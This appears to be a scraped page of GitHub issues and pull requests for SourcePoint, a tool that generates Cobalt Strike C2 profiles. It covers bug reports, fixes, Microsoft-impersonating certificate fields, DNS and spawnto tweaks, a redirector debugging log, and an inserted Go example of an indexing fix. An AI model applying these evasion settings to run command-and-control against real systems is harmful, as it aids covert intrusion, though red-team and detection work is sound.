    set O "Microsoft Corporation"; #Organization Name
    set C "US"; #Country
    set L "Redmond"; #Locality
    set OU "Microsoft IT"; #Organizational Unit Name
    set ST "WA"; #State or Province
    set validity "365"; #Number of days the cert is valid for
    }

  • Add HTTP Config Option (Feature Request)

    Add HTTP Config Option (Feature Request)

    Awesome project! Do you think you could add an additional option to set trust_x_forwarded_for in the http-config block for when using HTTP redirectors?

    http-config{
        set trust_x_forwarded_for "true";
    }
    
  • c2lint error to check

    c2lint error to check

    Does anyone encounter this problem? My CS version is 4.5

    [-] Error(s) while compiling /root/Downloads/edu.profile
    Error: invalid option for at line 8 tasks_max_size
    Error: invalid option for at line 9 tasks_proxy_max_size
    Error: invalid option for at line 10 tasks_dns_proxy_max_size
    [-] Unable to load the Beacon profile /root/Downloads/edu.profile

  • Cannot run with -PE_Clone 30

    Cannot run with -PE_Clone 30

    🐛 Summary

    There are 30 options for the PE_Clone, the last one being umppc.dll. When trying to specify #30, an error is thrown. This error comes from Loader.go

    To reproduce

    1. Run SourcePoint with the parameter -PE_Clone 30

    Any helpful log output or screenshots

    [*] Preparing Varibles...
    2022/07/08 15:49:17 Error: Please provide a valid PE number less the 31 option
    


  • Indexing error when setting PE_Name variable

    Indexing error when setting PE_Name variable

    🐛 Summary

    Line 93 of Loader/Loader.go uses PE[5] to reference the 5th element from the Beacon_Stage_p2 that is generated. 2/30 of the options in Struct/Struct.go do not have the image_size variables, so this line will reference the incorrect variable 1/15 times, or when specifying CyMemDef64.dll (27) or umppc.dll (30) as PE_Clone. The actual error is thrown on line 94 of Loader/Loader.go when printing the name after splitting by ".".

    To reproduce

    1. This error can be reproduced by running the code with -PE_Clone 27 or -PE_Clone 30

    Any helpful log output or screenshots

    [!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It
    panic: runtime error: index out of range [1] with length 1
    
    goroutine 1 [running]:
    github.com/Tylous/SourcePoint/Loader.GenerateOptions({_, _}, {_, _}, {_, _}, {_, _}, {0x0, 0x0}, ...)
            /tools/SourcePoint/Loader/Loader.go:94 +0x993
    main.main()
            /tools/SourcePoint/SourcePoint.go:252 +0xd11
    

    Below is a screenshot of the error that is thrown:


  • Multiple custom profile fixes and features

    Multiple custom profile fixes and features

    Sorry for the pull req with multiple changes - they're all focussed on the custom profile functionality

    1. Customuri broken

    Custom profile option did not utilise the parameter specified in the -Customuri argument. This was due to profile option 8 using:

    baseuri = "//"
    

    The correct base uri setting was in the unused profile 9. This has been copied over into profile 8 in commit a41fad8 , and now is:

    baseuri = "" + customuri + ""
    

    2. Added CustomuriGET and CustomuriPOST

    Enabling specification of different customuri parameters for each of GET and POST, matching the functionality of the built in profiles. Commit #0ca7789

    3. Removed requirement for valid SSL certificates when using custom profile

    Saves the additional setup when team server is only contactable via a secure backplane from redirectors.

    4. Readme housekeeping

    Added guidance for CustomuriGET and CustomuriPOST. Minor corrections around profile numbers for custom profile, as some references to 7 as custom profile still remained.

  • Fix incorrect array reference

    Fix incorrect array reference

    Array for GeneratePE function without beacon_PE arg specified incorrectly referenced the Post_EX_Process_Name array:

    • PE_Num would be assigned 0-26, and was crashing out if 17+, as the Post_EX_Process_Name array only has 17 values. Think this is the incorrect array altogether.

    Corrected to Peclone_list - In line with the PEclone_list array queried when beacon_PE arg is specified.

  • fixing indexing error

    fixing indexing error

    • Fix for indexing error mentioned in https://github.com/Tylous/SourcePoint/issues/14
    • Changed code to index length of the var - 3 to always reference the name.
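
    A constructed Go illustration of the fixed-index bug from issue 14 and the length-relative fix in this PR (added example, not SourcePoint's own code; the stage entry layout, sample values and function names are hypothetical), showing why a fixed offset fails once optional entries are missing and how to fail with an error rather than a panic:

```go
package main

import (
	"errors"
	"strings"
)

// ErrNoName is returned where the original code panicked with "index out of range".
var ErrNoName = errors.New("entry is not a parsable \"set name\" line")

// Constructed sample stage blocks (hypothetical, not SourcePoint's real output); the second omits the optional image_size entries.
var stageWithImageSize = []string{
	`set checksum "0";`,
	`set compile_time "14 Jul 2009 02:14:45";`,
	`set entry_point "650688";`,
	`set image_size_x86 "36864";`,
	`set image_size_x64 "36864";`,
	`set name "srv.dll";`,
	`set stomppe "true";`,
	`set userwx "false";`,
}
var stageWithoutImageSize = append(append([]string{}, stageWithImageSize[:3]...), stageWithImageSize[5:]...)

// baseName returns the file name without extension from a `set name "x.dll";` entry, validating the format before indexing the split result.
func baseName(entry string) (string, error) {
	if !strings.HasPrefix(entry, "set name ") {
		return "", ErrNoName
	}
	parts := strings.Split(strings.Trim(entry[len("set name "):], `";`), ".")
	if len(parts) < 2 || parts[0] == "" {
		return "", ErrNoName
	}
	return parts[0], nil
}

// nameAtFixedIndex is the pre-fix approach: a fixed offset that is only right when every optional entry is present.
func nameAtFixedIndex(stage []string, idx int) (string, error) {
	if idx < 0 || idx >= len(stage) {
		return "", ErrNoName
	}
	return baseName(stage[idx])
}

// nameFromEnd mirrors the PR's fix: the name entry is always the third from the end, so index relative to the length.
func nameFromEnd(stage []string) (string, error) {
	if len(stage) < 3 {
		return "", ErrNoName
	}
	return baseName(stage[len(stage)-3])
}
```

    With the sample blocks, nameAtFixedIndex(stage, 5) returns "srv" only for the block that has image_size entries, while nameFromEnd returns "srv" for both.
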

  • Added DNS Support & Spawnto fix

    Added DNS Support & Spawnto fix

    • Added DNS support. Idle DNS points to a Microsoft-owned IP.
    • Fixed one of the spawnto targets (dtdump.exe) which did not have an x64 binary. Now targets w32tm

  • http-get.client.metadata error

    http-get.client.metadata error

    Hello, I am getting an http-get.client.metadata error.

    Invalid session id [-] A Malleable C2 attempt to recover data from a '.http-get.client.metadata' transaction failed. This could be due to a bug in the profile, a change made to the profile after this Beacon was run, or a change made to the transaction by some device between your target and your Cobalt Strike controller. The following information will (hopefully) help narrow down what happened.

    Error

    From '15.158.36.55' URI '/safebrowsing/8ijb3/793g0INlUAzvUkU'

    Headers

    'REMOTE_ADDRESS' = '/xx.xx.xx.xx' 'Accept' = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8' 'CloudFront-Viewer-Country' = 'XX' 'CloudFront-Is-Tablet-Viewer' = 'false' 'CloudFront-Forwarded-Proto' = 'https' 'User-Agent' = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.10; rv:75.0) Gecko/20100101 Firefox/75.0' 'Connection' = 'Keep-Alive' 'Referer' = 'http://www.google.test' 'CloudFront-Is-Mobile-Viewer' = 'false' 'CloudFront-Is-SmartTV-Viewer' = 'false' 'Host' = 'd2mhkyo3wllxj8.cloudfront.net' 'Pragma' = 'no-cache' 'Via' = '1.1 xx.cloudfront.net (CloudFront)' 'Cache-Control' = 'no-cache' 'X-Amz-Cf-Id' = 'rQYhM_G34ARassaddsasdsadssadasadsddasdsadssadgK6lISasHqmV9xVCxxasxQ==' 'X-Forwarded-For' = 'x.x.x.x' 'CloudFront-Viewer-ASN' = '4657' 'CloudFront-Is-Desktop-Viewer' = 'true'

    This is my command to generate the SourcePoint profile: ./SourcePoint -Outfile test2.profile -Host xxx.cloudfront.net -Injector NtMapViewOfSection -Profile 5 -Password abcd! -Keystore a123.abc.cf.store

    Does anyone have experience in troubleshooting this, as I have been trying to troubleshoot it but to no avail ):

    Thanks in advance!
